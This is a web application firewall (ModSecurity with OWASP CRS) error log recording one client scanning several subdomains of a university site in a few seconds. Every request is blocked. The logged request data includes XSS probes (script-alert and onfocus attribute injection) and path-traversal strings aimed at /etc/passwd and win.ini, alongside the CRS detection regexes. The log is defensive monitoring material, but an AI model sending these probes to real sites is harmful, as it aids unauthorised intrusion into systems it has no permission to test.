[Tue Aug 29 11:54:42.581456 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EsCo-f0AAAqdbnIAAAAw"]
[Tue Aug 29 11:54:42.591056 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EsCo-f0AAAqWwXwAAAAl"]
[Tue Aug 29 11:54:44.577391 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqTvlEAAAAa"]
[Tue Aug 29 11:54:44.580575 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqWwYUAAAAl"]
[Tue Aug 29 11:54:44.583104 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqUB3oAAAAb"]
[Tue Aug 29 11:54:44.584107 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqdbnoAAAAw"]
[Tue Aug 29 11:54:44.624018 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAApV24kAAAAJ"]
[Tue Aug 29 11:54:45.650127 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bonfocus\\\\b\\\\W*?\\\\=" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "124"] [id "958409"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: onfocus= found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FcCo-f0AAApHRZEAAAAP"]
[Tue Aug 29 11:54:46.600130 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqdboAAAAAw"]
[Tue Aug 29 11:54:46.637029 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqQ@v0AAAAB"]
[Tue Aug 29 11:54:46.639879 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqUB4IAAAAb"]
[Tue Aug 29 11:54:46.659396 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqY57EAAAAr"]
[Tue Aug 29 11:54:46.659503 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqWwY4AAAAl"]
[Tue Aug 29 11:54:47.596726 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqY57IAAAAr"]
[Tue Aug 29 11:54:47.597584 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApbUW0AAAAh"]
[Tue Aug 29 11:54:47.618288 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqZubQAAAAs"]
[Tue Aug 29 11:54:47.620917 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApk-YQAAAAn"]
[Tue Aug 29 11:54:47.630233 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16F8Co-f0AAAqdboMAAAAw"]
[Tue Aug 29 11:54:47.673436 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqhN94AAAAE"]
[Tue Aug 29 11:54:48.611506 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16GMCo-f0AAAqQ@wUAAAAB"]
[Tue Aug 29 11:54:50.549179 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqSwk8AAAAN"]
[Tue Aug 29 11:54:50.554872 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqRzEkAAAAM"]
[Tue Aug 29 11:54:50.558615 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqhN@kAAAAE"]
[Tue Aug 29 11:54:50.559394 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApa-HkAAAAg"]
[Tue Aug 29 11:54:50.580902 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqTvlkAAAAa"]
[Tue Aug 29 11:54:50.586248 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqhN@oAAAAE"]
[Tue Aug 29 11:54:50.597168 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqXyR8AAAAq"]
[Tue Aug 29 11:54:50.608077 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqRzEsAAAAM"]
